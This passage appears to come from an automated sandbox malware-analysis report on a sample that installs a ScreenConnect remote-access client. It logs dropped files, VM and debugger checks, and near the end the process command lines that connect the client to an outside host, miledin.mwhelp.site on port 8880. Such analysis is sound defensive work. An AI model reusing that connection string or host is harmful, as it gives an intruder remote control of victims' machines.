                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 1D2BD210000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 1D2D6E20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeMemory allocated: BD0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeMemory allocated: 1A860000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeMemory allocated: 28E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeMemory allocated: 2AC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeMemory allocated: 4AC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 370Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 1728Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 2576Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeWindow / User API: threadDelayed 376Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..ient_4b14c015c87c1ad8_0018.0004_none_e9b66cfe0ceec305\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..dows_4b14c015c87c1ad8_0018.0004_none_5818e70d39ed8031\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..core_4b14c015c87c1ad8_0018.0004_none_53a10f2bfd9f6d01\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..vice_4b14c015c87c1ad8_0018.0004_none_04f4a774935ed06c\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe TID: 8092Thread sleep time: -40000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 8160Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7672Thread sleep time: -128800s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 8160Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe TID: 1712Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe TID: 2324Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe TID: 1340Thread sleep count: 376 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_00624B9B FindFirstFileExA,0_2_00624B9B
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeThread delayed: delay time: 40000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: Amcache.hve.13.drBinary or memory string: VMware
                  Source: Amcache.hve.13.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.13.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.13.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.13.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.13.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.13.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.13.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: dfsvc.exe, 00000001.00000002.3054816957.000001D2D987D000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3055864006.000001D2D9943000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3051108557.000001D2D750F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.13.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.13.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.13.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.13.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.13.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.13.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.13.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.13.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.13.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.13.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.13.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.13.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.13.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.13.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.13.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1874590511.000000001B169000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1My_
                  Source: Amcache.hve.13.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.13.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.13.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.13.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.13.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.13.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_00621920 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00621920
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_00621000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00621000
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_006237C7 mov eax, dword ptr fs:[00000030h]0_2_006237C7
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_006269E3 GetProcessHeap,0_2_006269E3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_00621493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00621493
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_00621920 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00621920
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_006246C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006246C3
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_00621AAD SetUnhandledExceptionFilter,0_2_00621AAD
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  .NET source code references suspicious native API functions
                  Source: ScreenConnect.ClientService.dll.1.dr, ClientService.csReference to suspicious API methods: WindowsExtensions.OpenProcess(processID, (ProcessAccess)33554432)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=miledin.mwhelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQC1BC7FdVJJFmJKDeQwCiJ3JJNEMl4x59nF7GGtNmjpuazxqDcF4oXznuaF7%2bPvugux9iQl0N%2fv66hQ12W0ZIEMc6tfjE3cMNDEOZODX53g06Q8bUHTzh2x%2f%2b%2bqrAZH38rwy8BEaezwgd3uPlgjgt802V5RYOIginnPSg2QEYJY4zP%2b13deRrkTtsV6UQI5iKxqWvcrjc%2fgnpsbKuxD%2f8jpqy4DtSBRMb9x3urpOt2zfLzMjV0lF10MnyNOj1gz6q1%2bFaQncjp2SQiX%2fLZxsoFe0atFkdojc3UhMzdhfUWSymENjpLdauviud8LLhJxAaEW8KIHkbGfg7iNE6VySqaj&r=&i=" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\dtabl3ol.hy1\do55etey.oe4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\screenconnect.clientservice.exe" "?e=support&y=guest&h=miledin.mwhelp.site&p=8880&k=bgiaaackaabsu0exaagaaaeaaqc1bc7fdvjjfmjkdeqwcij3jjneml4x59nf7ggtnmjpuazxqdcf4oxznuaf7%2bpvugux9iql0n%2fv66hq12w0ziemc6tfje3cmndeozodx53g06q8buhtzh2x%2f%2b%2bqrazh38rwy8beaezwgd3uplgjgt802v5ryoiginnpsg2qeyjy4zp%2b13derrkttsv6uqi5ikxqwvcrjc%2fgnpsbkuxd%2f8jpqy4dtsbrmb9x3urpot2zflzmjv0lf10mnynoj1gz6q1%2bfaqncjp2sqix%2flzxsofe0atfkdojc3uhmzdhfuwsymenjpldauviud8llhjxaaew8kihkbgfg7ine6vysqaj&r=&i=" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\dtabl3ol.hy1\do55etey.oe4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\screenconnect.clientservice.exe" "?e=support&y=guest&h=miledin.mwhelp.site&p=8880&k=bgiaaackaabsu0exaagaaaeaaqc1bc7fdvjjfmjkdeqwcij3jjneml4x59nf7ggtnmjpuazxqdcf4oxznuaf7%2bpvugux9iql0n%2fv66hq12w0ziemc6tfje3cmndeozodx53g06q8buhtzh2x%2f%2b%2bqrazh38rwy8beaezwgd3uplgjgt802v5ryoiginnpsg2qeyjy4zp%2b13derrkttsv6uqi5ikxqwvcrjc%2fgnpsbkuxd%2f8jpqy4dtsbrmb9x3urpot2zflzmjv0lf10mnynoj1gz6q1%2bfaqncjp2sqix%2flzxsofe0atfkdojc3uhmzdhfuwsymenjpldauviud8llhjxaaew8kihkbgfg7ine6vysqaj&r=&i=" "1"Jump to behavior
